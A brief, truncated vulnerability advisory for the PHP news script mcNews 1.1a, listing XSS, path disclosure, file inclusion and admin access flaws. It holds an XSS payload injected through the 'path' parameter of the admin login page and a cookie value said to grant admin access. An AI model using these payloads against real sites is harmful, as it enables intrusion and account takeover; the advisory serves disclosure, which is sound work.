Security holes : mcNews
Product : mcNews 1.1a http://www.phpforums.net Problems : - XSS - Path Disclosure - Including file - Admin access Exploits : - /admin/login.php?path="/formform name=ainput name=i value=XSSscriptalertdocument.a.i.value /script without '' - Setcookie "mcNews,frog" on admin pages -...